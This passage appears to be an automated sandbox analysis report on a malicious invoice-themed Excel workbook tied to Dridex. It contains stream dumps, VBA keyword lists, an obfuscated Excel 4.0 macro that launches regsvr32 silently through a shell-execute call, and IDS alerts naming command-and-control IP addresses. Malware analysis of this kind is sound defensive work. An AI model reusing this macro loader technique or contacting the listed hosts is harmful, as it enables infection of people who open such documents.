                                                                                                                              Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 e4 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Integer:
                                                                                                                              bycilke()
                                                                                                                              VB_Name
                                                                                                                              MiV(sem.value)
                                                                                                                              homepodd()
                                                                                                                              homepodd
                                                                                                                              Error
                                                                                                                              Integer)
                                                                                                                              bycilke
                                                                                                                              Function
                                                                                                                              ol).Name
                                                                                                                              "!"):
                                                                                                                              String
                                                                                                                              "ab":
                                                                                                                              Split(govs,
                                                                                                                              Randomize:
                                                                                                                              yellowsto(yel
                                                                                                                              Next:
                                                                                                                              ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                              yellowsto(Oa))))
                                                                                                                              Integer
                                                                                                                              yellowsto
                                                                                                                              ol).value
                                                                                                                              nimo(Int((UBound(nimo)
                                                                                                                              Replace(Vo,
                                                                                                                              Chr(sem.Row)
                                                                                                                              Sheets(ol).Cells(homepodd,
                                                                                                                              "ab"))
                                                                                                                              Split(kij(ol),
                                                                                                                              yellowsto(homepodd))
                                                                                                                              Rnd))
                                                                                                                              (Run(""
                                                                                                                              "moreP_"
                                                                                                                              Variant)
                                                                                                                              Attribute
                                                                                                                              Resume
                                                                                                                              pagesREviewsd(Optional
                                                                                                                              ecimovert(nimo
                                                                                                                              ecimovert
                                                                                                                              MsgBox
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: Sheet1.cls, Stream Size: 1627
                                                                                                                              General
                                                                                                                              Stream Path:VBA/Sheet1
                                                                                                                              VBA File Name:Sheet1.cls
                                                                                                                              Stream Size:1627
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                                              Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 ef 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Index
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              Application.OnTime
                                                                                                                              VB_Exposed
                                                                                                                              Long)
                                                                                                                              VB_Customizable
                                                                                                                              "REviewsd"
                                                                                                                              VB_Control
                                                                                                                              MultiPage"
                                                                                                                              VB_TemplateDerived
                                                                                                                              MSForms,
                                                                                                                              False
                                                                                                                              Attribute
                                                                                                                              Private
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              "pages"
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                              General
                                                                                                                              Stream Path:VBA/ThisWorkbook
                                                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                                                              Stream Size:999
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              "ThisWorkbook"
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code

                                                                                                                              Streams

                                                                                                                              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                              General
                                                                                                                              Stream Path:PROJECT
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:550
                                                                                                                              Entropy:5.2471217966
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 6 A 4 5 5 3 1 5 D 7 1 0 7 7 5 0 7 7 5 0 7 7 5 0 7 7 5 " . . D P B = " 4 C 4 E B F E 7 C 3 8 C C 4 8 C C 4 8 C "
                                                                                                                              Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                                              Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                              General
                                                                                                                              Stream Path:PROJECTwm
                                                                                                                              File Type:data
                                                                                                                              Stream Size:86
                                                                                                                              Entropy:3.24455457963
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3568
                                                                                                                              General
                                                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                                                              File Type:data
                                                                                                                              Stream Size:3568
                                                                                                                              Entropy:4.44836813862
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                              Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                              Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                              General
                                                                                                                              Stream Path:VBA/__SRP_0
                                                                                                                              File Type:data
                                                                                                                              Stream Size:2060
                                                                                                                              Entropy:3.44747656578
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . F . | . . . N . . . d 9 . . L . . . . . . . .
                                                                                                                              Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                              Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                              General
                                                                                                                              Stream Path:VBA/__SRP_1
                                                                                                                              File Type:data
                                                                                                                              Stream Size:187
                                                                                                                              Entropy:1.91493173134
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                                              Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                              General
                                                                                                                              Stream Path:VBA/__SRP_2
                                                                                                                              File Type:data
                                                                                                                              Stream Size:363
                                                                                                                              Entropy:2.21122978445
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                              Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                              General
                                                                                                                              Stream Path:VBA/__SRP_3
                                                                                                                              File Type:data
                                                                                                                              Stream Size:398
                                                                                                                              Entropy:2.07709195049
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                                                                                                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                              Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                                              General
                                                                                                                              Stream Path:VBA/dir
                                                                                                                              File Type:data
                                                                                                                              Stream Size:820
                                                                                                                              Entropy:6.50155040494
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                              Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 07 af eb 61 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                              Macro 4.0 Code

                                                                                                                              CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                              
                                                                                                                              "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm"

                                                                                                                              Indicators

                                                                                                                              Has Summary Info:False
                                                                                                                              Application Name:unknown
                                                                                                                              Encrypted Document:False
                                                                                                                              Contains Word Document Stream:
                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                              Contains Visio Document Stream:
                                                                                                                              Contains ObjectPool Stream:
                                                                                                                              Flash Objects Count:
                                                                                                                              Contains VBA Macros:False

                                                                                                                              Summary

                                                                                                                              Author:
                                                                                                                              Last Saved By:
                                                                                                                              Create Time:2020-12-07T14:38:21Z
                                                                                                                              Last Saved Time:2021-01-11T15:24:48Z
                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                              Security:0

                                                                                                                              Document Summary

                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                              Company:
                                                                                                                              Contains Dirty Links:false
                                                                                                                              Shared Document:false
                                                                                                                              Changed Hyperlinks:false
                                                                                                                              Application Version:16.0300

                                                                                                                              Streams

                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                              General
                                                                                                                              Stream Path:\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:115
                                                                                                                              Entropy:4.80096587863
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: f, File Type: data, Stream Size: 178
                                                                                                                              General
                                                                                                                              Stream Path:f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:178
                                                                                                                              Entropy:2.65549603888
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 r i . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                                              Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 72 69 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                              General
                                                                                                                              Stream Path:i02/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:110
                                                                                                                              Entropy:4.63372611993
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                                              General
                                                                                                                              Stream Path:i02/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:40
                                                                                                                              Entropy:1.54176014818
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:i02/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                              General
                                                                                                                              Stream Path:i03/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:110
                                                                                                                              Entropy:4.63372611993
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                                              General
                                                                                                                              Stream Path:i03/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:40
                                                                                                                              Entropy:1.90677964945
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:i03/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: o, File Type: data, Stream Size: 152
                                                                                                                              General
                                                                                                                              Stream Path:o
                                                                                                                              File Type:data
                                                                                                                              Stream Size:152
                                                                                                                              Entropy:2.92242946564
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . a @ . . . . P a g e 2 . a @ . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                                              Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 91 61 40 05 00 00 80 50 61 67 65 32 91 61 40 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                                              Stream Path: x, File Type: data, Stream Size: 48
                                                                                                                              General
                                                                                                                              Stream Path:x
                                                                                                                              File Type:data
                                                                                                                              Stream Size:48
                                                                                                                              Entropy:1.42267983198
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                                                                              Macro 4.0 Code

                                                                                                                              CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                              
                                                                                                                              "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              01/12/21-07:43:33.658950TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:36.136204TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:36.749119TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491725.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:36.749119TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491725.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:37.826247TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:38.350921TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:38.863671TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491765.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:38.863671TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491765.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:39.901704TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:40.429721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:40.959769TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491805.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:40.959769TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491805.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:41.993721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:42.512755TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:43.028953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491845.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:43.028953TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491845.100.228.233192.168.2.22
